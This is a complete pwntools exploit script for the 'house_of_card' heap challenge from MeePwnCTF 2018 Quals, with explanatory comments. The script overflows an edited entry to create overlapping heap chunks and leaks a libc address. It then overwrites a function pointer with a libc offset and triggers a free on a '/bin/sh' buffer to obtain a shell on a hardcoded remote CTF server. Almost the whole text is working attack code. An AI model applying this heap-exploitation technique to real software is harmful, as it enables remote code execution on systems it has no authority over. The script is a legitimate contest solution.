MeePwnCTF 2018 Quals house_of_card
#!/usr/bin/env python | |
from pwn import * | |
# pwntools terminal for gdb / interactive panes: a horizontal tmux split.
context(terminal=['tmux', 'splitw', '-h'])
# context(terminal=['tmux', 'new-window'])  # alternative: open a new tmux window
# libc = ELF('./libc.so')
# Target binary; the architecture for packing helpers is taken from its header.
elf = ELF('./house_of_card')
context(os='linux', arch=elf.arch)
# Endpoints selected by the first CLI argument below ('r' = remote, 'l' = local listener).
RHOST, RPORT = "178.128.87.12", 31336
LHOST, LPORT = "127.0.0.1", 31336
def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of section *name* in *elf*.

    *elf* defaults to the module-level target binary.  If no section with
    that name exists, ``get_section_by_name`` yields ``None`` and the
    attribute access below raises ``AttributeError``.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log the value of expression *ss* as ``<expr>: 0x<hex>``.

    *ss* is passed to ``eval()`` in this module's globals, so it must be a
    trusted literal written in this script (e.g. ``dbg('libc_base')``) and
    never a string derived from program output or the network.
    """
    value = eval(ss)
    log.info("{}: 0x{:x}".format(ss, value))
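conn = None  # assigned by exactly one branch below
# Connection mode from the first CLI argument (consumed so the rest of argv is untouched):
#   r = remote server, l = local listener, d = run under gdb with a script,
#   a = plain local process with gdb attached, anything else = plain local process.
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'
if opt in ('r', 'l'):
    # Tuple membership on purpose: the substring form `opt in 'rl'` also
    # accepted '' and 'rl', which then raised KeyError on the lookup below.
    host, port = {'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt]
    conn = remote(host, port)
elif opt == 'd':
    # NOTE: the script has no '{}' placeholder, so the formatted address
    # (main, or the entry point when main is not exported) is currently unused.
    gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols else elf.entrypoint))
    conn = gdb.debug(['./house_of_card'], gdbscript=gdbscript)
else:
    conn = process(['./house_of_card'])
    # conn = process(['./house_of_card'], env={'LD_PRELOAD': './libc.so'})
if opt == 'a':
    gdb.attach(conn)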
def add(name, size, desc):
    """Drive menu option 1 (create an entry) with *name*, *size* and *desc*.

    *name* and *desc* are sent raw, without an appended newline, so the
    caller supplies any terminator; *size* is converted with ``str()`` and
    sent as a full line.  Each payload is sent only after its prompt appears.
    """
    interaction = (
        (conn.sendlineafter, '4. Quit', '1'),
        (conn.sendafter, 'Name :', name),
        (conn.sendlineafter, 'Len?', str(size)),
        (conn.sendafter, 'Description:', desc),
    )
    for send, prompt, payload in interaction:
        send(prompt, payload)
def edit(idx, name, size, desc):
    """Drive menu option 2 (edit entry *idx*) with a new name, size and description.

    *idx* and *size* are converted with ``str()`` and sent as lines; *name* is
    sent raw after its prompt.  The description is sent with a plain
    ``conn.send`` without waiting for any prompt, so the caller must include
    whatever terminator the program expects.
    """
    prompted = (
        (conn.sendlineafter, '4. Quit', '2'),
        (conn.sendlineafter, 'Back.', str(idx)),
        (conn.sendafter, 'name?', name),
        (conn.sendlineafter, 'Len?', str(size)),
    )
    for send, prompt, payload in prompted:
        send(prompt, payload)
    # No prompt precedes the description in this flow; send it unconditionally.
    conn.send(desc)
def delete(idx):
    """Drive menu option 3 (delete entry *idx*).

    *idx* is converted with ``str()`` and sent as a line once the submenu's
    'Back.' prompt has been received.
    """
    choice, target = '3', str(idx)
    conn.sendlineafter('4. Quit', choice)
    conn.sendlineafter('Back.', target)
# exploit
# NOTE: the statements below are a fixed I/O dialogue with the target; their
# order is part of the protocol and must not be rearranged.
log.info('Pwning')
# overlap chunks for addless leak
# Four 0x80-byte entries. Names/descriptions carry their own '\n' because
# add() sends them raw.
add('hogehoge\n', 0x80, 'y'*0x10+'\n')
add('fugafuga\n', 0x80, 'y'*0x10+'\n')
add('piyopiyo\n', 0x80, 'y'*0x10+'\n')
add('bohebohe\n', 0x80, 'y'*0x10+'\n')
# Entry 1 is re-edited twice with a size larger than the 0x80 it was created with.
edit(1, 'hogehoge'*2+'\n', 0x80+0x80, 'ffffff\n')
edit(1, '/bin/sh\x00\n', 0x80+0x81, 'f'*0xf4 + p64(0xdeadbeef)*4 + p64(0xd0*2+1)+'\n')
delete(2)
add('fugafuga\n', 0xd0-8, 'y'*0x10+'\n')
# Menu option 2 lists entries; the 6 bytes printed after '[2] Name : ' are
# unpacked with u64 and a constant subtracted to obtain libc_base.
# NOTE(review): 0x3c1c18 here and 0x3c3788 / 0x456a0 below are tied to the
# challenge's specific libc build and will not hold for another libc.
conn.sendlineafter('4. Quit', '2')
conn.recvuntil('[2] Name : ')
libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c1c18
dbg('libc_base')
conn.sendline('5')  # presumably the 'Back' choice of the edit submenu -- not verifiable here
# overwrite __free_note
add('bohebohe\n', 0x80, 'a'*0x10+'\n')
edit(5, 'bohebohe\n', 0x81, 'a'*0x8c +p64(libc_base+0x3c3788)+'\n')
edit(5, p64(libc_base + 0x456a0) +'\n', 0x80, 'hgoe\n')
delete(1)
conn.interactive()